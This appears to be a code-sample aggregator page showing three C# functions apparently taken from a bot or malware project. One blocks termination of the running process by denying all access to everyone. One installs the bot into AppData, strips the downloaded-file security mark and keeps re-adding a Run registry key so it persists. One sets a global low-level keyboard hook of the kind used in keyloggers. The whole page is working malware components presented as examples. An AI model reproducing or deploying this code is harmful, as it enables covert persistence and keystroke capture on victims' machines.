Пример #1
0
        public static bool ProtectProcess(bool bProtect)
        {
            try
            {
                IntPtr hProcess = CKernel32.GetCurrentProcess();
                // Read the DACL
                RawSecurityDescriptor dacl = GetProcessSecurityDescriptor(hProcess);
                // Insert the new ACE
                dacl.DiscretionaryAcl.InsertAce(
                    0,
                    new CommonAce(
                        AceFlags.None,
                        bProtect ? AceQualifier.AccessDenied : AceQualifier.AccessAllowed,
                        (int)ProcessAccessRights.PROCESS_ALL_ACCESS,
                        new SecurityIdentifier(WellKnownSidType.WorldSid, null),
                        false,
                        null)
                    );
                // Save the DACL
                SetProcessSecurityDescriptor(hProcess, dacl);
                return(true);
            }
            catch { }

            return(false);
        }
Пример #2
0
        public static Boolean InstallBot()
        {
            try
            {
                String strDropPath = CUtils.GetAppData();

                if (String.IsNullOrEmpty(strDropPath))
                {
                    return(false);
                }

                String strMainPath = CUtils.GetMainPath();

                if (String.IsNullOrEmpty(strMainPath))
                {
                    return(false);
                }

                strDropPath += strFileName;

                if (strDropPath == strMainPath)
                {
                    new Thread(delegate()
                    {
                        while (bRegistryPersistance)
                        {
                            CRegistry.SetRegValue(CUtils.IsElevated() ? Registry.LocalMachine : Registry.CurrentUser, @"Software\Microsoft\Windows\CurrentVersion\Run", strRegistryName, strDropPath);

                            DateTime dtNextAdd = DateTime.Now.AddSeconds(15);

                            while (dtNextAdd > DateTime.Now && bRegistryPersistance)
                            {
                                Thread.Sleep(10);
                            }
                        }
                    }).Start();
                    return(true);
                }

                File.Copy(strMainPath, strDropPath, true);

                CKernel32.DeleteFile(
                    string.Format(
                        "{0}:Zone.Identifier",
                        strDropPath)
                    );

                if (CRegistry.SetRegValue(CUtils.IsElevated() ? Registry.LocalMachine : Registry.CurrentUser, @"Software\Microsoft\Windows\CurrentVersion\Run", strRegistryName, strDropPath))
                {
                    Process.Start(strDropPath);
                }
            }
            catch { }

            Application.Exit();

            return(false);
        }
Пример #3
0
        public static bool ApplyHook()
        {
            using (Process pCurrentProcess = Process.GetCurrentProcess())
            {
                using (ProcessModule pmModule = pCurrentProcess.MainModule)
                {
                    IntPtr pModule = CKernel32.GetModuleHandle(pmModule.ModuleName);

                    if (pModule == IntPtr.Zero)
                    {
                        return(false);
                    }

                    m_pHookID = CUser32.SetWindowsHookEx(
                        13,
                        m_HookCallback,
                        pModule,
                        0
                        );

                    return(m_pHookID != IntPtr.Zero);
                }
            }
        }